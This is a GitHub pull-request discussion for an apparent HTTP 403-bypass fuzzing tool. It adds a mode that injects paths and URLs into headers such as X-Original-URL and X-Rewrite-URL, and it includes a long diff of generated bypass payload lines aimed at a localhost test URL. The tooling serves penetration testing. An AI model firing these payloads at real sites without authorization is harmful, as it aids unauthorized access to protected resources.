Jtof fap header url #14

jtof-fap · 2022-11-21T09:11:26Z

Hey hey !

Another PR, it's been a long time !

Small tweaks for code cleaning and performance:

Use the * operator to make a list of tuple
Use sets in bypass_modes and http_versions
Use literals for dictionary declaration :-)

Added support for a new bypass mode -m http_headers_url:

26 new headers supposed to take an Url as argument (*URL, *URI, *Path, Referer, etc.) and approximately 170 additional bypass requests.

Fuzzing approach for this new mode. For example for X-Original-URL on http://127.0.0.1:8000/foo/bar url:

Classic variant: Targets the base_url and moves original path to the headers:
- -H X-Original-URL: /foo/bar http://127.0.0.1:8000/
Second variant: Targets the base_url and moves target_url to the headers (only for some headers susceptible to take a complete url as argument and not just a path) :
- -H X-Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
Third variant: Keeps the original target_url and go up the parent paths in headers:
- -H X-Original-URL: /foo http://127.0.0.1:8000/foo/bar
- -H X-Original-URL: / http://127.0.0.1:8000/foo/bar
Fourth variant: Same as third but with complete url (only for some headers):
- -H X-Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
- -H X-Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar

jtof-fap · 2022-11-21T09:12:10Z

Diff of bup-payloads-2022-11-21.lst file with previous version:

diff --git a/tests-history/bup-payloads-2022-10-06.lst b/tests-history/bup-payloads-2022-11-21.lst
index 000cb1a..af485f4 100644
--- a/tests-history/bup-payloads-2022-10-06.lst
+++ b/tests-history/bup-payloads-2022-11-21.lst
@@ -1,5 +1,5 @@

-Bypasser has generated 3044 payloads for 'http://127.0.0.1:8000/foo/bar' url:
+Bypasser has generated 3213 payloads for 'http://127.0.0.1:8000/foo/bar' url:
 [case_substitution] http://127.0.0.1:8000/Foo/bar
 [case_substitution] http://127.0.0.1:8000/fOo/bar
 [case_substitution] http://127.0.0.1:8000/foO/bar
@@ -2048,6 +2048,175 @@ Bypasser has generated 3044 payloads for 'http://127.0.0.1:8000/foo/bar' url:
 [http_headers_scheme] -H X-Url-Scheme: http http://127.0.0.1:8000/foo/bar
 [http_headers_scheme] -H X-Url-Scheme: https http://127.0.0.1:8000/foo/bar
 [http_headers_scheme] -H X-Url-Scheme: webdav http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Base-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Http-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Http-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-Request-FullURI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-Request-FullURI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-Request-FullURI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-Request-FullURI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Proxy-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Referer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Referer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Referer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H Request-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H Request-URI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Accel-Redirect: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Accel-Redirect: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Accel-Redirect: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Cf-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Cf-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Envoy-Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Envoy-Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Envoy-Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Flx-Redirect-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Flx-Redirect-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Forwarded-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-DestinationURL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-DestinationURL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-HTTP-Path-Override: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-Path-Override: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-HTTP-Path-Override: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-MS-Endpoint-Absolute-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Ning-Request-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Ning-Request-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Ning-Request-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Ning-Request-URI: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Original-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Override-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Override-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Path: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Path: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Path: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-Request: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-Request: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-Request: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-Request: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Proxy-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Referrer: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Referrer: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Rewrite-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Rewrite-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Route-Request: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Route-Request: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Route-Request: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Route-Request: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Sendfile: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Sendfile: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Sendfile: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Sendfile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URI: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URI: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URI: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URL: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/ http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-URL: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Wap-Profile: / http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Wap-Profile: /foo http://127.0.0.1:8000/foo/bar
+[http_headers_url] -H X-Wap-Profile: /foo/bar http://127.0.0.1:8000/
+[http_headers_url] -H X-Wap-Profile: http://127.0.0.1:8000/foo/bar http://127.0.0.1:8000/
 [http_methods] -X ACL http://127.0.0.1:8000/foo/bar
 [http_methods] -X BIND http://127.0.0.1:8000/foo/bar
 [http_methods] -X CHECKIN http://127.0.0.1:8000/foo/bar

laluka · 2022-11-21T09:15:08Z

Awesome addon man!
What's the matter with the { to [ change? What's the gain?
Is the mode also invoked by default when "all" is being used?

jtof-fap · 2022-11-21T09:32:09Z

On the performance part no significant change but since the last commit when I can use a set instead of list in a loop I don't hesitate anymore :-) I had coded this just after the last PR.

The new mode is invoked by default:
if any(mode in {"all", "http_headers_url"} for mode in self.current_bypass_modes):

jtof-fap added 5 commits October 8, 2022 00:45

Use the * operator to make a list of tuple

ebb2115

Use sets in bypass_modes and http_versions

ee5d42b

Use literals for dictionary declaration

d23e360

Add http_headers_url bypass mode

ae93b5f

Update readme and bup-payloads

41dc232

jtof-fap requested a review from laluka November 21, 2022 09:11

laluka approved these changes Nov 21, 2022

View reviewed changes

jtof-fap merged commit b5d6a98 into main Nov 21, 2022

jtof-fap deleted the jtof-fap-header-url branch November 21, 2022 09:41

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Jtof fap header url #14

Jtof fap header url #14

Uh oh!

jtof-fap commented Nov 21, 2022

Uh oh!

jtof-fap commented Nov 21, 2022

Uh oh!

laluka commented Nov 21, 2022

Uh oh!

jtof-fap commented Nov 21, 2022

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants

Jtof fap header url #14

Jtof fap header url #14

Uh oh!

Conversation

jtof-fap commented Nov 21, 2022

Uh oh!

jtof-fap commented Nov 21, 2022

Uh oh!

laluka commented Nov 21, 2022

Uh oh!

jtof-fap commented Nov 21, 2022

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants